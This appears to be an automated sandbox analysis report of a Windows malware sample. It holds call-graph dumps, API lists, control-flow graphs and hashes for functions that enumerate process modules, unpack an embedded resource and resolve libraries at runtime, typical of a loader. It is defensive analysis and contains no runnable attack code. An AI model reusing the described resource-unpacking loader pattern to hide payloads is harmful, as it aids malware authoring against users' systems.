13386->13387 13388 40fa20 63 API calls 13387->13388 13388->13380 13390 4106bc 63 API calls 13389->13390 13391 40bfd9 13390->13391 13391->13348 13393 4155a5 13392->13393 13394 415600 13393->13394 13397 40d6e0 63 API calls 13393->13397 13395 415622 13394->13395 13396 415605 EnterCriticalSection 13394->13396 13395->13357 13396->13395 13398 4155d1 13397->13398 13399 4155e8 13398->13399 13401 41389c InitializeCriticalSectionAndSpinCount 13398->13401 13469 415630 13399->13469 13401->13399 13403 40fd69 13402->13403 13404 40fd4e 13402->13404 13405 40fd78 13403->13405 13407 40fd9f 13403->13407 13406 40bfd4 63 API calls 13404->13406 13408 40bfd4 63 API calls 13405->13408 13409 40fd53 13406->13409 13411 40fdbe 13407->13411 13422 40fdd2 13407->13422 13410 40fd7d 13408->13410 13412 40bfc1 63 API calls 13409->13412 13413 40bfc1 63 API calls 13410->13413 13414 40bfd4 63 API calls 13411->13414 13423 40fd5b 13412->13423 13416 40fd84 13413->13416 13418 40fdc3 13414->13418 13415 40fe2a 13417 40bfd4 63 API calls 13415->13417 13419 40e744 6 API calls 13416->13419 13420 40fe2f 13417->13420 13421 40bfc1 63 API calls 13418->13421 13419->13423 13424 40bfc1 63 API calls 13420->13424 13425 40fdca 13421->13425 13422->13415 13422->13423 13426 40fe06 13422->13426 13428 40fe4b 13422->13428 13423->13366 13424->13425 13427 40e744 6 API calls 13425->13427 13426->13415 13431 40fe11 ReadFile 13426->13431 13427->13423 13429 411c75 63 API calls 13428->13429 13432 40fe61 13429->13432 13433 4102b8 GetLastError 13431->13433 13434 40ff3d 13431->13434 13437 40fe87 13432->13437 13438 40fe69 13432->13438 13435 4102c5 13433->13435 13436 41013e 13433->13436 13434->13433 13441 40ff51 13434->13441 13439 40bfc1 63 API calls 13435->13439 13449 4100c3 13436->13449 13483 40bfe7 13436->13483 13473 414f8f 13437->13473 13440 40bfc1 63 API calls 13438->13440 13443 4102ca 13439->13443 13444 40fe6e 13440->13444 13441->13449 13459 40ff6d 13441->13459 13460 410183 13441->13460 13446 40bfd4 63 API calls 13443->13446 13447 40bfd4 63 API calls 13444->13447 13446->13449 13447->13423 13448 40b6b5 63 API calls 13448->13423 13449->13423 13449->13448 13450 40ffd3 ReadFile 13453 40fff1 GetLastError 13450->13453 13450->13459 13451 4101fb ReadFile 13454 41021a GetLastError 13451->13454 13451->13460 13453->13459 13454->13460 13455 410138 GetLastError 13455->13436 13456 410050 13456->13449 13457 4100cb 13456->13457 13458 4100be 13456->13458 13464 410088 MultiByteToWideChar 13456->13464 13457->13464 13465 414f8f 65 API calls 13457->13465 13461 40bfc1 63 API calls 13458->13461 13459->13450 13459->13456 13462 414f8f 65 API calls 13459->13462 13460->13449 13460->13451 13463 414f8f 65 API calls 13460->13463 13461->13449 13462->13459 13463->13460 13464->13449 13464->13455 13465->13464 13501 415639 LeaveCriticalSection 13466->13501 13468 4103ef 13468->13360 13472 40d606 LeaveCriticalSection 13469->13472 13471 415637 13471->13394 13472->13471 13488 415522 13473->13488 13475 414fad 13476 414fb5 13475->13476 13477 414fc6 SetFilePointer 13475->13477 13479 40bfc1 63 API calls 13476->13479 13478 414fde GetLastError 13477->13478 13481 414fba 13477->13481 13480 414fe8 13478->13480 13478->13481 13479->13481 13482 40bfe7 63 API calls 13480->13482 13481->13431 13482->13481 13484 40bfd4 63 API calls 13483->13484 13485 40bff2 13484->13485 13486 40bfc1 63 API calls 13485->13486 13487 40c005 13486->13487 13487->13449 13489 41552f 13488->13489 13492 415547 13488->13492 13490 40bfd4 63 API calls 13489->13490 13491 415534 13490->13491 13494 40bfc1 63 API calls 13491->13494 13493 40bfd4 63 API calls 13492->13493 13495 41558c 13492->13495 13496 415575 13493->13496 13497 41553c 13494->13497 13495->13475 13498 40bfc1 63 API calls 13496->13498 13497->13475 13499 41557c 13498->13499 13500 40e744 6 API calls 13499->13500 13500->13495 13501->13468 13503 411c75 63 API calls 13502->13503 13504 415142 13503->13504 13504->13375 13506 40fbcc LeaveCriticalSection 13505->13506 13507 40fbad 13505->13507 13506->13323 13507->13506 13508 40fbb4 13507->13508 13511 40d606 LeaveCriticalSection 13508->13511 13510 40fbc9 13510->13323 13511->13510 13514 404f96 13512->13514 13520 404fd5 13512->13520 13513 404fe7 13513->13265 13514->13513 13515 40bfc1 63 API calls 13514->13515 13516 404fa1 13515->13516 13517 40bf62 77 API calls 13516->13517 13518 404fbb 13517->13518 13518->13513 13519 40bc8e 63 API calls 13518->13519 13519->13520 13520->13265 14432 40fb09 14439 40c3d8 14432->14439 14435 40fb1c 14437 40b6b5 63 API calls 14435->14437 14438 40fb27 14437->14438 14440 40c2ab 101 API calls 14439->14440 14441 40c3df 14440->14441 14441->14435 14442 4157fa 14441->14442 14443 415806 14442->14443 14444 40d6e0 63 API calls 14443->14444 14450 415812 14444->14450 14445 41587b 14452 415890 14445->14452 14447 415887 14447->14435 14448 40c081 102 API calls 14448->14450 14449 415850 DeleteCriticalSection 14451 40b6b5 63 API calls 14449->14451 14450->14445 14450->14448 14450->14449 14451->14450 14455 40d606 LeaveCriticalSection 14452->14455 14454 415897 14454->14447 14455->14454 14456 40b70b 14459 40d606 LeaveCriticalSection 14456->14459 14458 40b712 14459->14458 14138 4054b0 14139 4053f0 99 API calls 14138->14139 14140 4054c1 14139->14140 14141 4054d1 14140->14141 14143 40c385 14140->14143 14144 40c391 14143->14144 14145 40c3a1 14144->14145 14146 40c398 14144->14146 14148 40fb29 64 API calls 14145->14148 14154 40c2ab 14146->14154 14149 40c3a9 14148->14149 14164 40c263 14149->14164 14152 40c39e 14152->14141 14155 40c2b7 14154->14155 14156 40d6e0 63 API calls 14155->14156 14163 40c2c6 14156->14163 14157 40c35e 14185 40c37c 14157->14185 14160 40c36a 14160->14152 14162 40c263 101 API calls 14162->14163 14163->14157 14163->14162 14177 40fb6a 14163->14177 14182 40c34d 14163->14182 14165 40c270 14164->14165 14166 40c279 14164->14166 14167 40c2ab 101 API calls 14165->14167 14168 40c1fb 97 API calls 14166->14168 14173 40c276 14167->14173 14169 40c27f 14168->14169 14170 40fa20 63 API calls 14169->14170 14169->14173 14171 40c298 14170->14171 14195 4117e3 14171->14195 14174 40c3ce 14173->14174 14175 40fb9c 2 API calls 14174->14175 14176 40c3d6 14175->14176 14176->14152 14178 40fb77 14177->14178 14179 40fb8d EnterCriticalSection 14177->14179 14180 40d6e0 63 API calls 14178->14180 14179->14163 14181 40fb80 14180->14181 14181->14163 14188 40fbd8 14182->14188 14184 40c35b 14184->14163 14194 40d606 LeaveCriticalSection 14185->14194 14187 40c383 14187->14160 14189 40fbe8 14188->14189 14190 40fbfb LeaveCriticalSection 14188->14190 14193 40d606 LeaveCriticalSection 14189->14193 14190->14184 14192 40fbf8 14192->14184 14193->14192 14194->14187 14196 4117ef 14195->14196 14197 4117f7 14196->14197 14198 41180a 14196->14198 14199 40bfc1 63 API calls 14197->14199 14200 411818 14198->14200 14202 411852 14198->14202 14207 4117fc 14199->14207 14201 40bfc1 63 API calls 14200->14201 14203 41181d 14201->14203 14204 415599 64 API calls 14202->14204 14205 40e744 6 API calls 14203->14205 14206 411858 14204->14206 14205->14207 14208 411891 14206->14208 14209 415522 63 API calls 14206->14209 14207->14173 14210 40bfc1 63 API calls 14208->14210 14211 41186d FlushFileBuffers 14209->14211 14212 41189b 14210->14212 14213 411884 14211->14213 14214 411879 GetLastError 14211->14214 14217 4118ba 14212->14217 14213->14212 14216 40bfd4 63 API calls 14213->14216 14214->14213 14216->14208 14220 415639 LeaveCriticalSection 14217->14220 14219 4118c2 14219->14207 14220->14219

                                                                                                                                        Executed Functions

                                                                                                                                        Function 004019F0 Relevance: 135.5, APIs: 28, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 32 401cd0-401cd4 24->32 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 41 401f1c-401f2f 30->41 42 401f5f-401f69 30->42 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->48 49 401f77-401f8d call 401560 43->49 44->43 45->32 45->39 46->7 50 401d0f 46->50 47->42 48->5 85 4021aa-4021c0 48->85 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 69 401d5d-401d7b call 401650 65->69 67->63 71 401d42-401d4a 67->71 68->65 76 401d80-401d84 69->76 71->61 71->68 79 401da0-401da2 76->79 80 401d86-401d88 76->80 84 401da5-401da7 79->84 82 401d8a-401d90 80->82 83 401d9c-401d9e 80->83 82->79 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->76 86->83 87->7 87->54 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 #8 call 401870 #8 call 4018d0 104->106 114 4022c3-40232a call 4018d0 #15 #23 call 40b350 #24 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 #16 122->128 129 40235b-402361 122->129 123->122 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-4023a2 call 4018d0 #411 133->135 134->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 #9 * 2 call 4019a0 142->144 143->144 146 40241c-40242c #9 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
                                                                                                                                        APIs
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 00401DC4
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32
                                                                                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                        • API String ID: 693451461-2962942730
                                                                                                                                        • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                        • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                        Function 0040E7C3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 152 40e7c3-40e7d5 GetModuleHandleW 153 40e7d7-40e7e5 GetProcAddress 152->153 154 40e7ec-40e7ed 152->154 153->154 155 40e7e7-40e7ea CorExitProcess 153->155 155->154
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                        • CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressExitHandleModuleProcProcess
                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                        • API String ID: 75539706-1276376045
                                                                                                                                        • Opcode ID: 5704aca5f5ecdaa3d57f3352e77ea2b8a015caad99495bbcc1e51de28377031d
                                                                                                                                        • Instruction ID: 13dbb3e6ef43035a159a1267b6351ab0e26cdcbf0334b58bc2f3653a625ca4b4
                                                                                                                                        • Opcode Fuzzy Hash: 5704aca5f5ecdaa3d57f3352e77ea2b8a015caad99495bbcc1e51de28377031d
                                                                                                                                        • Instruction Fuzzy Hash: 69D0A9383402042B8B202FB29C08A8BBE8CCD88B403020432B61CE22A2CB38C81184AD
                                                                                                                                        Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 156 4018f0-4018fa 157 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 156->157 158 4018fc-401900 156->158 161 401940-401949 GetLastError 157->161 162 401996-40199a 157->162 163 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 161->163 164 40198d-40198f 161->164 163->164 164->162 165 401991 call 401030 164->165 165->162
                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3322701435-0
                                                                                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                        Function 0040CBDD Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 169 40cbdd-40cbf5 call 40e1d8 172 40cbf7-40cc06 169->172 173 40cc2f 169->173 172->173 175 40cc08-40cc14 172->175 174 40cc33-40cc3d call 40d534 173->174 180 40cc47-40cc4e call 41087e 174->180 181 40cc3f-40cc46 call 40cbb4 174->181 175->173 177 40cc16-40cc1d 175->177 177->173 178 40cc1f-40cc2d 177->178 178->174 186 40cc50-40cc57 call 40cbb4 180->186 187 40cc58-40cc68 call 4129c9 call 411a15 180->187 181->180 186->187 194 40cc72-40cc8e GetCommandLineA call 412892 call 4127d7 187->194 195 40cc6a-40cc71 call 40e79a 187->195 202 40cc90-40cc97 call 40e79a 194->202 203 40cc98-40cc9f call 41255f 194->203 195->194 202->203 208 40cca1-40cca8 call 40e79a 203->208 209 40cca9-40ccb3 call 40e859 203->209 208->209 214 40ccb5-40ccbb call 40e79a 209->214 215 40ccbc-40cce2 call 4019f0 209->215 214->215 220 40cce4-40cce5 call 40ea0a 215->220 221 40ccea-40cd2e call 40ea36 call 40e21d 215->221 220->221
                                                                                                                                        APIs
                                                                                                                                        • GetCommandLineA.KERNEL32(?,?,?,?,?,?,004211C0,00000014), ref: 0040CC72
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CommandLine
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3253501508-0
                                                                                                                                        • Opcode ID: 20a121aa98deea0d6a92869a37a8ce0eeafbf8083c9a382c391b16779d8042bc
                                                                                                                                        • Instruction ID: dd0e71ad339a9163951c18b6e10ac978c43bbda227cf44f0d89655e40ba473a7
                                                                                                                                        • Opcode Fuzzy Hash: 20a121aa98deea0d6a92869a37a8ce0eeafbf8083c9a382c391b16779d8042bc
                                                                                                                                        • Instruction Fuzzy Hash: A921A770A45305DAFB247BB3ED8676932B46F10309F10457FE508B62D2EB7C89918B5D
                                                                                                                                        Function 0040B84D Relevance: 1.6, APIs: 1, Instructions: 77memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 228 40b84d-40b859 229 40b900-40b912 call 40d2e3 call 40bfc1 228->229 230 40b85f-40b861 228->230 246 40b914-40b916 229->246 231 40b867-40b86e 230->231 233 40b870-40b887 call 40ec4d call 40eaa2 call 40e7ee 231->233 234 40b888-40b890 231->234 233->234 236 40b8a0-40b8a3 234->236 237 40b892-40b894 234->237 242 40b8b0-40b8b2 236->242 243 40b8a5-40b8ae call 40b7fe 236->243 240 40b896-40b898 237->240 241 40b89a-40b89c 237->241 247 40b89d-40b89e 240->247 241->247 249 40b8b4 242->249 250 40b8b5-40b8bb 242->250 243->242 255 40b8c6-40b8ca 243->255 252 40b8bc-40b8c4 RtlAllocateHeap 247->252 249->250 250->252 252->255 258 40b8fa-40b8fe 255->258 259 40b8cc-40b8d5 255->259 258->246 260 40b8d7-40b8e2 call 40d2e3 259->260 261 40b8ec-40b8f1 call 40bfc1 259->261 266 40b8f3-40b8f8 call 40bfc1 260->266 267 40b8e4-40b8e7 260->267 261->266 266->258 267->231
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: aa93b8d22f7ad34e63f46d7b64e669d396b5d5323d1cadc1ac016a0a3615800e
                                                                                                                                        • Instruction ID: 311cf82ab874880c1827e3b42f79a9926f6ae2cec6008b7cb6d5cd9a65976436
                                                                                                                                        • Opcode Fuzzy Hash: aa93b8d22f7ad34e63f46d7b64e669d396b5d5323d1cadc1ac016a0a3615800e
                                                                                                                                        • Instruction Fuzzy Hash: 5011B433A002165BD6217B6A9C41B5A675CDF11368F15443BF800BB2F1CB7C9D4156DD
                                                                                                                                        Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 270 401870-401883 call 40af66 273 4018b2 270->273 274 401885-4018a2 SysAllocString 270->274 275 4018b4-4018b8 273->275 274->275 276 4018a4-4018a6 274->276 278 4018c4-4018c9 275->278 279 4018ba-4018bf call 40ad90 275->279 276->275 277 4018a8-4018ad call 40ad90 276->277 277->273 279->278
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                        • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                        • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                        • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                        • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                                        Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 282 40d534-40d556 HeapCreate 283 40d558-40d559 282->283 284 40d55a-40d563 282->284
                                                                                                                                        APIs
                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                        • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                        • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                        • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                        • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                        Function 0040E7EE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 285 40e7ee-40e7f6 call 40e7c3 287 40e7fb-40e7ff ExitProcess 285->287
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                          • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                          • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1002262038-0
                                                                                                                                        • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                        • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
